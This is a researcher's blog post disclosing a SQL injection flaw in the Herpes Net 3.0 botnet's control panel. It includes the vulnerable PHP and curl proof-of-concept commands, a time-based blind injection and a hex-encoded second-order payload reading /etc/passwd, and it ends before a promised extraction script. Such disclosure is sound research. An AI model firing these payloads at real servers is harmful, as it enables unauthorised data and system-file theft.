@botnet_hunter's blog
Herpes Net 3.0 SQLi

During my talk at RSAC 2014, we announced multiple botnet vulnerabilities which had been discovered. The following vulnerability is one of them. Herpes Net is botnet with a wide range of functions, with everything from opening the CD tray to mining bitcoins (via plugins). With a vulnerability in the command and control panel, we can get information on the botnet operator.

When this vulnerability was discovered by myself, I had thought it was a rediscovery of a vulnerability discovered by malware.lu. Upon further investigation into their proof of concept, I found that the parameter they are injecting on no longer exists. Instead of injecting on the ‘id’ parameter, we can inject on the the ‘hwid’ parameter. The following is the vulnerable code (only relevant code displayed).

	$hwid = $_POST['hwid'];
	if($header == "74978b6ecc6c19836a17a3c2cd0840b0")
	{
		if ($hwid <> "")
		{
			$bottest = mysql_query("SELECT * FROM clients WHERE hwid = '$hwid'");
			while($row = mysql_fetch_array($bottest))
		 	{$id = $row['id'];}
			if(mysql_num_rows($bottest) == 1){
				$result = mysql_query("SELECT * FROM commands WHERE botid = '$id' AND viewed = '0' LIMIT 1");
				while($row = mysql_fetch_array($result))
				{
					echo $row['cmd']."|".$row['variable'];

A keen eye will notice that there are two vulnerable queries in this code selection. The first query, while injectable, does not have a direct influence on output. While blind SQL injection is not improbable, it does make for quite a bit more noise when trying to extract information. Just for reference though, here is a proof of concept blind SQLi.

curl -A "74978b6ecc6c19836a17a3c2cd0840b0" -v http://c2.com/panels/herpes/run.php -d "hwid=' AND 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,BENCHMARK(10000, SLEEP(1000)) -- --"

This should sleep for quite a while if exploited successfully. If only we can get a result from the database to print out, we could use a much simpler, faster and quieter exploit. If we return a SQL injection payload from the first query, we can exploit the next one, and return data to be read. Here is what we want in our second query’s payload for a proof of concept.

' AND 1=2 UNION ALL SELECT 1,2,load_file('/etc/passwd'),4,5 -- --

In order to do that, we should hex encode it.

0x2720414e4420313d3220554e494f4e20414c4c2053454c45435420312c322c6c6f61645f66696c6528272f6574632f70617373776427292c342c35202d2d202d2d

And now our proof of concept looks like the following.

curl -A "74978b6ecc6c19836a17a3c2cd0840b0" -v http://c2.com/panels/herpes/run.php -d "hwid=' AND 1=2 UNION ALL SELECT 0x2720414e4420313d3220554e494f4e20414c4c2053454c45435420312c322c6c6f61645f66696c6528272f6574632f70617373776427292c342c35202d2d202d2d,2,3,4,5,6,7,8,9 -- --"

The data returned will be followed by ‘|4’ as that is what is being returned in the ‘variable’ row. We can of course control this value as well if needed.

Here is a proof of concept which uses this second order SQL injection to extract the bot information from the database.

Design pdevty